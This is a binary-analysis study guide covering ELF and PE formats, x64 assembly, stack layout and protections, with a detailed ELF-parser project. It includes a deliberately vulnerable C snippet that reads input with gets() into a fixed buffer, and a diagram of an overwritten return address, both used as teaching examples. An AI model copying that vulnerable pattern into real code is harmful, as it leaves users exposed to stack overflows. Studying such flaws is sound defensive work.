LEARN BINARY ANALYSIS

Learn Binary Analysis: From Zero to Reverse Engineering Master

Goal: Deeply understand binary analysis, from file formats and assembly to disassembly, debugging, exploitation, malware analysis, and building your own reverse engineering tools.


Why Learn Binary Analysis?

Binary analysis is the art of understanding compiled programs without source code. It's the foundation of:

  • Security Research: Finding vulnerabilities in closed-source software
  • Malware Analysis: Understanding what malicious software does
  • CTF Competitions: Binary exploitation (pwn) challenges
  • Game Hacking/Modding: Reverse engineering game mechanics
  • Software Archaeology: Understanding legacy systems
  • Compiler Development: Seeing how high-level code becomes machine code

After completing these projects, you will:

  • Read and understand x86/x64 assembly fluently
  • Analyze any binary file format (ELF, PE, Mach-O)
  • Use professional tools (Ghidra, IDA, radare2, GDB)
  • Exploit buffer overflows and build ROP chains
  • Analyze malware safely and effectively
  • Build your own disassembler and analysis tools

Core Concept Analysis

The Binary Analysis Landscape

┌──────────────────────────────────────────────────────────────────────────┐
│                        SOURCE CODE (if available)                        │
│                                                                          │
│   int main() {                                                           │
│       char buf[64];                                                      │
│       gets(buf);        // Vulnerable!                                   │
│       return 0;                                                          │
│   }                                                                      │
└──────────────────────────────────────────────────────────────────────────┘
                                 │
                                 ▼ Compilation
┌──────────────────────────────────────────────────────────────────────────┐
│                        BINARY EXECUTABLE                                 │
│                                                                          │
│   7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00   .ELF............     │
│   03 00 3e 00 01 00 00 00 40 10 00 00 00 00 00 00   ..>.....@.......     │
│   ...                                                                    │
└──────────────────────────────────────────────────────────────────────────┘
                                 │
          ┌──────────────────────┼──────────────────────┐
          ▼                      ▼                      ▼
┌──────────────────┐  ┌──────────────────┐  ┌──────────────────┐
│ STATIC ANALYSIS  │  │ DYNAMIC ANALYSIS │  │   EXPLOITATION   │
│                  │  │                  │  │                  │
│ • Disassembly    │  │ • Debugging      │  │ • Buffer Overflow│
│ • Decompilation  │  │ • Tracing        │  │ • ROP Chains     │
│ • CFG Analysis   │  │ • Instrumentation│  │ • Shellcode      │
│ • String Search  │  │ • Emulation      │  │ • Format Strings │
└──────────────────┘  └──────────────────┘  └──────────────────┘

Key Concepts Explained

1. Binary File Formats

ELF (Executable and Linkable Format) - Linux/Unix

┌──────────────────────────────────────────┐
│       ELF Header (64 bytes, ELF64)       │
│  • Magic: 0x7F 'E' 'L' 'F'               │
│  • Class: 32-bit or 64-bit               │
│  • Entry point address                   │
│  • Program header offset                 │
│  • Section header offset                 │
├──────────────────────────────────────────┤
│         Program Header Table             │
│  (Segments - runtime view)               │
│  • PT_LOAD: Loadable segments            │
│  • PT_DYNAMIC: Dynamic linking info      │
│  • PT_INTERP: Interpreter path           │
├──────────────────────────────────────────┤
│              Sections                    │
│  .text    - Executable code              │
│  .data    - Initialized data             │
│  .bss     - Uninitialized data           │
│  .rodata  - Read-only data (strings)     │
│  .plt     - Procedure Linkage Table      │
│  .got     - Global Offset Table          │
│  .symtab  - Symbol table                 │
│  .strtab  - String table                 │
├──────────────────────────────────────────┤
│         Section Header Table             │
│  (Sections - linking view)               │
└──────────────────────────────────────────┘

PE (Portable Executable) - Windows

┌──────────────────────────────────────────┐
│           DOS Header                     │
│  • Magic: 'MZ' (0x5A4D)                  │
│  • e_lfanew: Offset to PE header         │
├──────────────────────────────────────────┤
│           DOS Stub                       │
│  "This program cannot be run in DOS mode"│
├──────────────────────────────────────────┤
│           PE Signature: "PE\0\0"         │
├──────────────────────────────────────────┤
│           COFF File Header               │
│  • Machine type (x86, x64, ARM)          │
│  • Number of sections                    │
│  • Timestamp                             │
├──────────────────────────────────────────┤
│        Optional Header (PE32/PE32+)      │
│  • Entry point (AddressOfEntryPoint)     │
│  • ImageBase (preferred load address)    │
│  • Data directories (imports, exports)   │
├──────────────────────────────────────────┤
│           Section Headers                │
│  .text   - Code                          │
│  .data   - Initialized data              │
│  .rdata  - Read-only data, imports       │
│  .rsrc   - Resources (icons, dialogs)    │
└──────────────────────────────────────────┘

2. x86/x64 Assembly Fundamentals

Registers (x64)

General Purpose (64-bit; "Arg N" follows the System V AMD64 ABI):
┌────────────────────────┬────────────────────────────────────┐
│ RAX (accumulator)      │ Return values, arithmetic          │
│ RBX (base)             │ Callee-saved, general purpose      │
│ RCX (counter)          │ Arg 4, loop counter                │
│ RDX (data)             │ Arg 3, I/O, multiplication         │
│ RSI (source index)     │ Arg 2, string source               │
│ RDI (destination)      │ Arg 1, string destination          │
│ RBP (base pointer)     │ Stack frame base (callee-saved)    │
│ RSP (stack pointer)    │ Current stack top                  │
│ R8-R15                 │ General purpose (R8, R9: args 5-6) │
└────────────────────────┴────────────────────────────────────┘

Special Registers:
┌────────────────────────┬────────────────────────────────────┐
│ RIP (instruction ptr)  │ Address of next instruction        │
│ RFLAGS                 │ Status flags (ZF, CF, SF, OF)      │
└────────────────────────┴────────────────────────────────────┘

Register Sizes:
┌────────┬────────┬────────┬────────────┬───────────┐
│ 64-bit │ 32-bit │ 16-bit │ 8-bit high │ 8-bit low │
├────────┼────────┼────────┼────────────┼───────────┤
│  RAX   │  EAX   │   AX   │     AH     │    AL     │
│  RBX   │  EBX   │   BX   │     BH     │    BL     │
│  RCX   │  ECX   │   CX   │     CH     │    CL     │
│  RDX   │  EDX   │   DX   │     DH     │    DL     │
└────────┴────────┴────────┴────────────┴───────────┘

Calling Conventions

Linux x64 (System V AMD64 ABI):
  Arguments: RDI, RSI, RDX, RCX, R8, R9 (then stack)
  Return:    RAX (and RDX for 128-bit)
  Caller-saved: RAX, RCX, RDX, RSI, RDI, R8-R11
  Callee-saved: RBX, RBP, R12-R15

Windows x64:
  Arguments: RCX, RDX, R8, R9 (then stack, with shadow space)
  Return:    RAX
  Caller-saved: RAX, RCX, RDX, R8-R11
  Callee-saved: RBX, RBP, RDI, RSI, R12-R15

Common Instructions

; Data Movement
mov  rax, rbx       ; rax = rbx
lea  rax, [rbx+8]   ; rax = rbx + 8 (computes the address, no memory access)
push rax            ; Push rax onto stack
pop  rax            ; Pop top of stack into rax

; Arithmetic
add  rax, rbx       ; rax = rax + rbx
sub  rax, rbx       ; rax = rax - rbx
imul rax, rbx       ; rax = rax * rbx (signed)
xor  rax, rax       ; rax = 0 (clear register, common idiom)

; Comparison & Jumps
cmp  rax, rbx       ; Compare (sets flags)
test rax, rax       ; AND without storing (sets ZF if rax == 0)
jmp  label          ; Unconditional jump
je   label          ; Jump if equal (ZF=1)
jne  label          ; Jump if not equal (ZF=0)
jl   label          ; Jump if less (signed)
jg   label          ; Jump if greater (signed)

; Function Calls
call func           ; Push return address, jump to func
ret                 ; Pop return address, jump to it

; System Calls (Linux x64)
syscall             ; Invoke kernel (syscall number in RAX)

3. Stack Layout (x64)

High addresses
┌──────────────────────────────────────────┐
│           Previous Stack Frame           │
├──────────────────────────────────────────┤
│              Return Address              │  ← Pushed by CALL
├──────────────────────────────────────────┤
│              Saved RBP                   │  ← Pushed by function prologue
├──────────────────────────────────────────┤  ← RBP points here
│              Local Variable 1            │
├──────────────────────────────────────────┤
│              Local Variable 2            │
├──────────────────────────────────────────┤
│              Buffer (e.g., char[64])     │
├──────────────────────────────────────────┤  ← RSP points here
│              (Stack grows down)          │
└──────────────────────────────────────────┘
Low addresses

Function Prologue:
    push rbp          ; Save old base pointer
    mov  rbp, rsp     ; Set new base pointer
    sub  rsp, N       ; Allocate N bytes for locals

Function Epilogue:
    mov  rsp, rbp     ; Restore stack pointer
    pop  rbp          ; Restore old base pointer
    ret               ; Return to caller
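
The frame layout above reduces to simple offset arithmetic. The following Python sketch (Python is used here only for brevity) computes how far the saved RBP and the return address sit above the start of a stack buffer. The helper name frame_offsets and its parameters are hypothetical, and the sketch assumes the frame-pointer layout drawn above with no compiler padding or stack canary; real compilers often add both.

```python
def frame_offsets(buffer_size: int, locals_above: int = 0) -> dict:
    """Byte distances from the start of a stack buffer to the slots above it.

    Assumption: frame-pointer layout as in the diagram, with no padding or
    canary between the locals and the saved RBP.
    """
    saved_rbp = buffer_size + locals_above   # saved RBP sits just above the locals
    return_address = saved_rbp + 8           # one 8-byte slot further up
    return {"saved_rbp": saved_rbp, "return_address": return_address}


print(frame_offsets(64))      # {'saved_rbp': 64, 'return_address': 72}
print(frame_offsets(64, 16))  # {'saved_rbp': 80, 'return_address': 88}
```

In practice, confirm these distances in a debugger rather than trusting the arithmetic, since alignment and protections change the layout.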

4. Buffer Overflow Basics

Normal execution:
┌─────────────┐
│ Return Addr │ → points to caller
├─────────────┤
│ Saved RBP   │
├─────────────┤
│ Buffer[64]  │ ← User input goes here
└─────────────┘

After overflow:
┌─────────────┐
│ AAAA...AAAA │ ← Overwritten return address (0x4141...41 here;
├─────────────┤     an attacker would supply a chosen target instead)
│ AAAA...AAAA │ ← Overwritten saved RBP
├─────────────┤
│ AAAAAAAAAA  │ ← Original buffer, filled with 'A's
│ AAAAAAAAAA  │
│ AAAAAAAAAA  │
└─────────────┘

5. Static vs Dynamic Analysis

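┌───────────┬──────────────────────────┬─────────────────────┐
│ Aspect    │ Static Analysis          │ Dynamic Analysis    │
├───────────┼──────────────────────────┼─────────────────────┤
│ Execution │ No execution             │ Runs the binary     │
│ Tools     │ Disassembler, Decompiler │ Debugger, Tracer    │
│ Pros      │ Safe, complete coverage  │ See actual behavior │
│ Cons      │ Can't see runtime values │ May miss code paths │
│ Examples  │ Ghidra, IDA, radare2     │ GDB, strace, ltrace │
└───────────┴──────────────────────────┴─────────────────────┘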

6. Modern Protections

┌──────────────────────┬──────────────────────────────────────┐
│ Protection           │ What it does                         │
├──────────────────────┼──────────────────────────────────────┤
│ ASLR                 │ Randomize memory layout              │
│ Stack Canary         │ Detect stack buffer overflows        │
│ NX/DEP               │ Non-executable stack/heap            │
│ PIE                  │ Position-independent executable      │
│ RELRO                │ Read-only GOT after relocation       │
│ CFI                  │ Restrict indirect branch targets     │
└──────────────────────┴──────────────────────────────────────┘

Check protections with checksec:
$ checksec --file=./binary
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled

Project List

The following 18 projects will teach you binary analysis from fundamentals to advanced techniques.


Project 1: ELF File Parser

  • File: LEARN_BINARY_ANALYSIS.md
  • Main Programming Language: C
  • Alternative Programming Languages: Python, Rust, Go
  • Coolness Level: Level 3: Genuinely Clever
  • Business Potential: 1. The "Resume Gold"
  • Difficulty: Level 2: Intermediate
  • Knowledge Area: Binary Formats / File Parsing
  • Software or Tool: ELF binaries, hex editor
  • Main Book: "Practical Binary Analysis" by Dennis Andriesse

What you'll build: A command-line tool that parses ELF files and displays all headers, sections, segments, symbols, and relocations in a human-readable format, like a simplified readelf.

Why it teaches binary analysis: Every reverse engineering task starts with understanding the file format. Building a parser forces you to understand every byte of the ELF structure.

Core challenges you'll face:

  • Parsing the ELF header → maps to understanding magic bytes, class (32/64-bit), endianness
  • Reading program headers → maps to segments, what gets loaded into memory
  • Reading section headers → maps to sections, symbols, strings
  • Handling different architectures → maps to x86, ARM, MIPS variations

Resources for key challenges:

  • Linux Audit - ELF Binaries - Excellent overview
  • "Practical Binary Analysis" Chapter 2 - Comprehensive ELF explanation
  • man elf - The elf(5) manual page, a compact reference to the ELF structures

Key Concepts:

  • ELF Header Structure: "Practical Binary Analysis" Ch. 2 - Andriesse
  • Program vs Section Headers: elf(5) man page
  • Symbol Tables: "Learning ELF" - Can Ozkan (Medium)

Difficulty: Intermediate
Time estimate: 1-2 weeks
Prerequisites: C programming, understanding of pointers and structs, familiarity with hexadecimal

Real world outcome:

$ ./elf_parser /bin/ls
ELF Header:
  Magic:   7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00
  Class:   ELF64
  Data:    2's complement, little endian
  Version: 1 (current)
  OS/ABI:  UNIX - System V
  Type:    DYN (Shared object file)
  Machine: AMD x86-64
  Entry:   0x6b10

Program Headers:
  Type           Offset   VirtAddr         FileSiz  MemSiz   Flg
  PHDR           0x000040 0x0000000000000040 0x0002d8 0x0002d8 R
  INTERP         0x000318 0x0000000000000318 0x00001c 0x00001c R
  LOAD           0x000000 0x0000000000000000 0x003510 0x003510 R
  ...

Sections:
  [Nr] Name              Type       Address          Size
  [ 0]                   NULL       0x0000000000000000 0x0
  [ 1] .interp           PROGBITS   0x0000000000000318 0x1c
  [ 2] .note.gnu.build-id NOTE      0x0000000000000338 0x24
  ...

Symbols:
  Num:    Value          Size Type    Bind   Name
    1: 0000000000000000     0 FUNC    GLOBAL printf@GLIBC_2.2.5
    2: 0000000000006b10   123 FUNC    GLOBAL _start
  ...

Implementation Hints:

Start by mapping the ELF header structure:

// Don't write code, but understand this structure:
// Elf64_Ehdr contains:
//   e_ident[16]  - Magic number and other info
//   e_type       - Object file type (ET_EXEC, ET_DYN, etc.)
//   e_machine    - Architecture (EM_X86_64, EM_ARM, etc.)
//   e_entry      - Entry point virtual address
//   e_phoff      - Program header table file offset
//   e_shoff      - Section header table file offset
//   e_phnum      - Number of program headers
//   e_shnum      - Number of section headers
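
As a rough illustration of the fields listed above, the following sketch decodes an ELF64 header with Python's standard struct module. Python is used only to keep the example short; the project itself targets C. The function name parse_elf64_header and the returned dict are assumptions made for this example, and ELF32 files are deliberately rejected rather than handled.

```python
import struct

# Fields of Elf64_Ehdr that follow the 16-byte e_ident array, in file order.
EHDR64_FORMAT = "HHIQQQIHHHHHH"
EHDR64_NAMES = (
    "e_type", "e_machine", "e_version", "e_entry", "e_phoff", "e_shoff",
    "e_flags", "e_ehsize", "e_phentsize", "e_phnum",
    "e_shentsize", "e_shnum", "e_shstrndx",
)


def parse_elf64_header(data: bytes) -> dict:
    """Decode the first 64 bytes of an ELF64 file into a dict of fields."""
    if len(data) < 64:
        raise ValueError("need at least 64 bytes for an ELF64 header")
    if data[:4] != b"\x7fELF":
        raise ValueError("bad magic: not an ELF file")
    if data[4] != 2:  # EI_CLASS: 1 = 32-bit, 2 = 64-bit
        raise ValueError("this sketch only handles ELF64")
    if data[5] == 1:    # EI_DATA: 1 = little-endian
        order = "<"
    elif data[5] == 2:  # EI_DATA: 2 = big-endian
        order = ">"
    else:
        raise ValueError("unknown EI_DATA value")
    values = struct.unpack_from(order + EHDR64_FORMAT, data, 16)
    return dict(zip(EHDR64_NAMES, values))
```

A typical call would pass the first 64 bytes of a file opened in binary mode, then print fields such as e_entry and e_phnum for comparison against readelf -h.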

Questions to guide your implementation:

  1. How do you detect if a file is 32-bit or 64-bit ELF?
  2. How do you find the string table section to get section names?
  3. What's the difference between .dynsym and .symtab?
  4. How do program headers map sections to memory segments?

Learning milestones:

  1. Parse ELF header correctly → Understand file identification
  2. Iterate program headers → Understand runtime memory layout
  3. Iterate section headers → Understand linking and symbols
  4. Resolve symbol names → Understand string tables

The Core Question You're Answering

How does the operating system transform a static file on disk into a running process in memory, and what information does it need from the binary format to make this transformation?

This question drives everything in binary analysis. The ELF format exists to bridge the gap between storage and execution; understanding it means understanding how programs come to life.

Concepts You Must Understand First

1. Binary File Formats vs. In-Memory Representations

A binary file is just structured data on disk. When executed, the OS loader reads this file and creates a completely different structure in memory. Understanding the distinction is critical.

Guiding questions:

  • Why can't the OS just load a file directly into memory and jump to it?
  • What transformations must happen between disk and memory?
  • How does the loader know where to place code vs data in memory?

Key reading: "Computer Systems: A Programmer's Perspective" Ch. 7 (Linking), "Practical Binary Analysis" Ch. 2 (The ELF Format)

2. Virtual Memory and Address Spaces

Every process believes it has the entire address space to itself. The ELF file tells the OS where to map segments in this virtual space.

Guiding questions:

  • What's the difference between a file offset and a virtual address?
  • Why do ELF files specify both p_offset and p_vaddr?
  • How does the loader handle position-independent executables (PIE)?
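
To make the p_offset versus p_vaddr distinction concrete, here is a minimal Python sketch that translates a virtual address back to a file offset using PT_LOAD-style segment records. The Load tuple and the vaddr_to_offset helper are hypothetical names for this example, and the segment values in the usage note are made up for illustration rather than read from a real binary.

```python
from typing import NamedTuple, Optional, Sequence


class Load(NamedTuple):
    """The four program-header fields this translation needs."""
    p_offset: int  # where the segment starts in the file
    p_vaddr: int   # where the segment starts in virtual memory
    p_filesz: int  # bytes backed by the file
    p_memsz: int   # bytes occupied in memory (>= p_filesz, e.g. for .bss)


def vaddr_to_offset(segments: Sequence[Load], vaddr: int) -> Optional[int]:
    """Return the file offset backing vaddr, or None if no file bytes back it."""
    for seg in segments:
        if seg.p_vaddr <= vaddr < seg.p_vaddr + seg.p_filesz:
            return seg.p_offset + (vaddr - seg.p_vaddr)
    return None
```

With segments such as Load(0x0, 0x400000, 0x1000, 0x1000) and Load(0x1000, 0x601000, 0x200, 0x800), address 0x400123 maps to offset 0x123, while 0x601300 returns None because it lies in the zero-filled tail that exists only in memory.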

Key reading: "Computer Systems: A Programmer's Perspective" Ch. 9 (Virtual Memory), "Low-Level Programming" Ch. 4 (Virtual Memory)

3. Linking: Static, Dynamic, and Runtime

Programs rarely stand alone; they call library functions. ELF contains metadata for three types of linking.

Guiding questions:

  • What's in .symtab vs .dynsym and why do we need both?
  • How does the dynamic linker find printf at runtime?
  • What happens during relocation?

Key reading: "Computer Systems: A Programmer's Perspective" Ch. 7.7-7.10 (Dynamic Linking), "Practical Binary Analysis" Ch. 2.3 (Symbols and Relocations)

4. Sections vs. Segments: A Critical Distinction

Sections serve the linker (link time); segments serve the loader (run time). This distinction is one of the most commonly confused aspects of ELF.

Guiding questions:

  • Can multiple sections map to one segment?
  • Why does readelf show both section headers and program headers?
  • Which is more important for reverse engineering: sections or segments?

Key reading: "Practical Binary Analysis" Ch. 2.2.4 (Sections and Segments), man elf (NOTES section)

5. Byte Order (Endianness)

Binary formats encode multi-byte integers. The byte order matters when reading file structures.

Guiding questions:

  • How do you detect endianness from the ELF header?
  • What happens if you parse a big-endian ELF on a little-endian machine?
  • Which fields in Elf64_Ehdr are multi-byte?
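
The effect of byte order on a multi-byte field can be seen with a two-byte value. This Python sketch decodes the same bytes under both settings of e_ident[EI_DATA]; the helper name read_u16 is an assumption for this example.

```python
import struct


def read_u16(raw: bytes, ei_data: int) -> int:
    """Decode a 2-byte field using the byte order named by e_ident[EI_DATA]."""
    if ei_data == 1:   # ELFDATA2LSB: little-endian
        return struct.unpack("<H", raw)[0]
    if ei_data == 2:   # ELFDATA2MSB: big-endian
        return struct.unpack(">H", raw)[0]
    raise ValueError("unknown EI_DATA value")


raw = bytes([0x3E, 0x00])     # e_machine bytes as stored in an x86-64 ELF
print(hex(read_u16(raw, 1)))  # 0x3e   (EM_X86_64, the correct reading)
print(hex(read_u16(raw, 2)))  # 0x3e00 (what a wrong byte order produces)
```

Reading the field with the wrong order does not fail; it silently yields a different number, which is why a parser should check EI_DATA before decoding anything else.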

Key reading: "Computer Systems: A Programmer's Perspective" Ch. 2.1 (Information Storage), "Hacking: The Art of Exploitation" Ch. 2 (Programming)

6. String Tables and Symbol Resolution

Strings in ELF aren't stored inline; they live in dedicated string table sections and are referenced by offset.

Guiding questions:

  • Why use offsets into .strtab instead of embedding strings?
  • How do you find the name of a section?
  • What's the relationship between .symtab and .strtab?
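
Offset-based lookup is easy to try on a hand-built table. The sketch below, in Python for brevity, reads the NUL-terminated name at a given offset; strtab_name is a hypothetical helper name, and the sample table is invented for illustration.

```python
def strtab_name(strtab: bytes, offset: int) -> str:
    """Return the NUL-terminated string that starts at offset in a string table."""
    if not 0 <= offset < len(strtab):
        raise ValueError("offset outside string table")
    end = strtab.find(b"\x00", offset)
    if end == -1:
        raise ValueError("string is not NUL-terminated")
    return strtab[offset:end].decode("utf-8", errors="replace")


strtab = b"\x00printf\x00main\x00"
print(strtab_name(strtab, 1))  # printf
print(strtab_name(strtab, 8))  # main
print(strtab_name(strtab, 3))  # intf
```

The last call shows one reason for the design: an offset may point into the middle of an existing string, so names that share a suffix can share storage.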

Key reading: "Practical Binary Analysis" Ch. 2.3.1 (The Symbol Table), man elf (String Table section)

7. Position-Independent Code (PIC) and ASLR

Modern systems randomize addresses. ELF supports this through relocations and GOT/PLT.

Guiding questions:

  • How can you tell if an ELF is position-independent?
  • What's the difference between ET_EXEC and ET_DYN?
  • Why do some binaries have a base address of 0x400000 and others 0x0?

Key reading: "Practical Binary Analysis" Ch. 5.4 (Position-Independent Code), "Computer Systems: A Programmer's Perspective" Ch. 7.12 (Position-Independent Code)

Questions to Guide Your Design

  1. How will you handle both 32-bit and 64-bit ELF files? The structures are different (Elf32_Ehdr vs Elf64_Ehdr). Will you use compile-time selection or runtime detection?

  2. What's your error handling strategy? What if the file claims to have 50 section headers but the file is too small? Corrupted binaries are common in malware analysis.

  3. How will you deal with endianness? Will you support parsing big-endian ELF files on little-endian hosts?

  4. Should you use mmap() or read()? Memory-mapping the file vs reading it into a buffer has different implications for large files.

  5. How will you represent and display multi-byte values? Should you show e_machine as 0x3e or EM_X86_64 or AMD x86-64?

  6. What level of validation will you implement? Check magic bytes only, or validate every offset and size field?

  7. How will you handle stripped binaries? What if .symtab is missing but .dynsym exists?

  8. Should your parser be a library or a standalone tool? Consider reusability for future projects.
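
Questions 2 and 6 above come down to never trusting a size or offset field until it has been checked against the file length. A minimal sketch of such a check, in Python for brevity, with the hypothetical helper name table_fits:

```python
def table_fits(file_size: int, table_offset: int,
               entry_count: int, entry_size: int) -> bool:
    """True if a header table of entry_count entries lies entirely inside the file."""
    if min(file_size, table_offset, entry_count, entry_size) < 0:
        return False
    return table_offset + entry_count * entry_size <= file_size


# 13 program headers of 56 bytes at offset 64 in a 4096-byte file: plausible.
print(table_fits(4096, 64, 13, 56))   # True
# 50 section headers of 64 bytes claimed at offset 900 in a 1000-byte file.
print(table_fits(1000, 900, 50, 64))  # False
```

Python integers do not overflow, so the multiplication is safe here. A C implementation of the same check needs to guard against wraparound in the offset and size arithmetic.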

Thinking Exercise

Before writing any code, perform these manual exercises:

Exercise 1: Hex Dump Analysis

xxd -l 128 /bin/ls

Using only the hex dump and the ELF specification (man elf):

  1. Identify the magic number
  2. Determine if it's 32-bit or 64-bit
  3. Find the entry point address
  4. Locate the program header table offset
  5. Count the number of program headers

Write down the byte offsets and values. This forces you to understand the exact layout.

Exercise 2: Compare readelf Output

readelf -h /bin/ls
readelf -l /bin/ls
readelf -S /bin/ls

Create a mapping:

  • Which bytes in the hex dump correspond to "Entry point address"?
  • How does readelf calculate the "Start of section headers"?
  • Why is "Number of section headers" sometimes wrong? (Hint: files with 0xff00 or more sections store the real count elsewhere)

Exercise 3: Trace the String Table

Using readelf -x .strtab /bin/ls, manually (on a stripped binary, substitute .dynsym and .dynstr):

  1. Find a symbol name in .symtab
  2. Extract its st_name offset
  3. Navigate to that offset in .strtab
  4. Verify the null-terminated string

This teaches you how indirection works in binary formats.

Exercise 4: Draw the Memory Map

Using readelf -l, draw a diagram showing:

  • Which segments get loaded where in virtual memory
  • How segments overlap or abut
  • Where the .text and .data sections end up

Virtual Memory:
0x0000000000400000  +------------------+
                    | LOAD (R+X)       |  <- .text, .rodata
0x0000000000600000  +------------------+
                    | LOAD (RW)        |  <- .data, .bss
0x0000000000601000  +------------------+

The Interview Questions They'll Ask

  1. "What's the difference between a section and a segment in ELF?"
    • Sections are for linking (used by ld), segments are for loading (used by execve). One segment can contain multiple sections.
  2. "How does the dynamic linker know which libraries to load?"
    • The DT_NEEDED entries in the .dynamic section list required libraries. The dynamic linker searches DT_RPATH, LD_LIBRARY_PATH, DT_RUNPATH, the ld.so cache, and the default system paths.
  3. "Can you explain the GOT and PLT?"
    • Global Offset Table (GOT) stores addresses of external symbols. Procedure Linkage Table (PLT) provides lazy binding: a function is resolved only when it is first called.
  4. "What happens when you execute a PIE binary?"
    • The kernel chooses a random base address (ASLR), loads all LOAD segments relative to that base, and passes the resulting addresses (for example AT_PHDR and AT_ENTRY) to the process through the auxiliary vector.
  5. "How do you find the main() function in a stripped binary?"
    • Even stripped, _start is the entry point. Disassemble it: it calls __libc_start_main with main as an argument. That argument is the address of main.
  6. "What's the significance of the .interp section?"
    • It specifies the path to the dynamic linker (e.g., /lib64/ld-linux-x86-64.so.2). Without it, dynamically linked programs can't run.
  7. "Explain how relocations work."
    • Relocations are fixups applied by the linker/loader. They adjust addresses based on where code is actually loaded. R_X86_64_RELATIVE stores the load base plus the relocation's addend into the target field.
  8. "Why do some binaries have two symbol tables (.symtab and .dynsym)?"
    • .dynsym contains only symbols needed for dynamic linking (kept in release builds). .symtab has all symbols (often stripped from release builds).
  9. "How can you detect if a binary is packed or encrypted?"
    • Look for high entropy in sections (should be code, but looks random), unusual section names, small .text sections with large writable sections, or UPX headers.
  10. "What's the difference between ET_EXEC, ET_DYN, and ET_REL?"
    • ET_EXEC: executable with fixed load addresses (non-PIE; may still be dynamically linked). ET_DYN: shared object or PIE executable. ET_REL: relocatable object file (.o files).
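
The entropy check mentioned in question 9 is usually Shannon entropy over byte values, measured in bits per byte. A minimal Python sketch follows; the function name shannon_entropy is an assumption for this example, and any cutoff for "packed" is a rule of thumb to tune per corpus rather than a fixed constant.

```python
import math
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy of a byte string in bits per byte (0.0 to 8.0)."""
    if not data:
        return 0.0
    total = len(data)
    counts = Counter(data)
    # Sum p * log2(1/p) over every byte value that occurs.
    return sum((n / total) * math.log2(total / n) for n in counts.values())


print(shannon_entropy(b"\x00" * 100))      # 0.0 (a single repeated byte)
print(shannon_entropy(bytes(range(256))))  # 8.0 (every byte value equally often)
```

Ordinary machine code tends to fall well below the maximum, while compressed or encrypted data sits close to 8 bits per byte, so computing this per section gives a quick first signal.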

Books That Will Help

Topic | Book | Chapter/Section
ELF Format Overview | "Practical Binary Analysis" by Dennis Andriesse | Ch. 2: The ELF Format
ELF Loading Process | "Computer Systems: A Programmer's Perspective" by Bryant & O'Hallaron | Ch. 7.9: Loading Executable Object Files
ELF Headers and Structures | "Low-Level Programming" by Igor Zhirkov | Ch. 12: System Calls, Ch. 13: Models of Computation
Symbol Tables | "Computer Systems: A Programmer's Perspective" | Ch. 7.5: Symbols and Symbol Tables
Dynamic Linking | "Computer Systems: A Programmer's Perspective" | Ch. 7.7-7.12: Dynamic Linking
Relocations | "Practical Binary Analysis" | Ch. 2.3.3: Relocations
Virtual Memory | "Computer Systems: A Programmer's Perspective" | Ch. 9: Virtual Memory
File I/O in C | "Hacking: The Art of Exploitation" by Jon Erickson | Ch. 2: Programming (File Access section)
Binary Data Structures | "Low-Level Programming" by Igor Zhirkov | Ch. 3: Assembly Language, Ch. 4: Virtual Memory
GOT/PLT Internals | "Practical Binary Analysis" | Ch. 2.3.4: Dynamic Linking
Position-Independent Code | "Computer Systems: A Programmer's Perspective" | Ch. 7.12: Position-Independent Code (PIC)
ASLR and Security | "Hacking: The Art of Exploitation" | Ch. 5: Shellcode (ASLR section)
Stripped Binary Analysis | "Practical Malware Analysis" by Sikorski & Honig | Ch. 6: Recognizing C Code Constructs
Reference: ELF Specification | man elf (Linux manual) | All sections

ASCII Diagram: ELF File Structure

+---------------------------+
|      ELF Header           |  <-- Always at offset 0
|  e_ident[16]              |      Contains magic number, class, endianness
|  e_type, e_machine        |      File type and architecture
|  e_entry                  |      Entry point virtual address
|  e_phoff, e_phnum         |  --> Points to Program Header Table
|  e_shoff, e_shnum         |  --> Points to Section Header Table
+---------------------------+
|                           |
|   Program Header Table    |  <-- For loader (runtime)
|   [Elf64_Phdr entries]    |      Describes segments
|   - LOAD (code)           |      e.g., map file offset X to vaddr Y
|   - LOAD (data)           |           with permissions RWX
|   - DYNAMIC               |
|   - INTERP                |
+---------------------------+
|                           |
|   .text section           |  <-- Executable code
|   (machine code bytes)    |
+---------------------------+
|   .rodata section         |  <-- Read-only data (strings)
|   "Hello, world\0"        |
+---------------------------+
|   .data section           |  <-- Initialized writable data
|   global variables        |
+---------------------------+
|   .bss section            |  <-- Uninitialized data (zero-filled)
|   (no bytes on disk!)     |      Only occupies memory at runtime
+---------------------------+
|   .symtab section         |  <-- Symbol table (often stripped)
|   [Elf64_Sym entries]     |      Function/variable names & addresses
+---------------------------+
|   .strtab section         |  <-- String table for .symtab
|   "\0printf\0main\0..."   |      Null-separated strings
+---------------------------+
|   .dynsym section         |  <-- Dynamic symbols (not stripped)
+---------------------------+
|   .dynstr section         |  <-- String table for .dynsym
+---------------------------+
|                           |
|   Section Header Table    |  <-- For linker (link-time)
|   [Elf64_Shdr entries]    |      Describes sections
|   - sh_name, sh_type      |      Name offset, section type
|   - sh_addr, sh_offset    |      Virtual addr, file offset
|   - sh_size, sh_link      |      Size, link to related section
+---------------------------+

Key insight: Program headers (segments) are what matters at runtime. Section headers are metadata for tools like ld and gdb. A normal strip only removes .symtab and debug data, but even a binary whose section header table has been removed entirely still runs fine.
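
A minimal sketch of that split, assuming a 64-bit little-endian ELF: it reads only the ELF header and reports where the program header table and section header table live. The helper name `summarize_elf64_header` and the synthetic header bytes are made up for illustration; the field order follows the Elf64_Ehdr layout.

```python
import struct

# Elf64_Ehdr, little-endian: e_ident[16], e_type, e_machine, e_version, e_entry,
# e_phoff, e_shoff, e_flags, e_ehsize, e_phentsize, e_phnum, e_shentsize,
# e_shnum, e_shstrndx (64 bytes in total).
ELF64_EHDR = struct.Struct("<16sHHIQQQIHHHHHH")

def summarize_elf64_header(data: bytes) -> dict:
    """Report where the two tables live (hypothetical helper for illustration)."""
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    if data[4] != 2 or data[5] != 1:
        raise ValueError("this sketch only handles 64-bit little-endian ELF")
    fields = ELF64_EHDR.unpack_from(data, 0)
    e_phoff, e_shoff = fields[5], fields[6]
    e_phnum, e_shnum = fields[10], fields[12]
    return {
        "e_phoff": e_phoff, "e_phnum": e_phnum,   # what the loader reads
        "e_shoff": e_shoff, "e_shnum": e_shnum,   # what ld, gdb, readelf read
        "has_section_headers": e_shoff != 0 and e_shnum != 0,
    }

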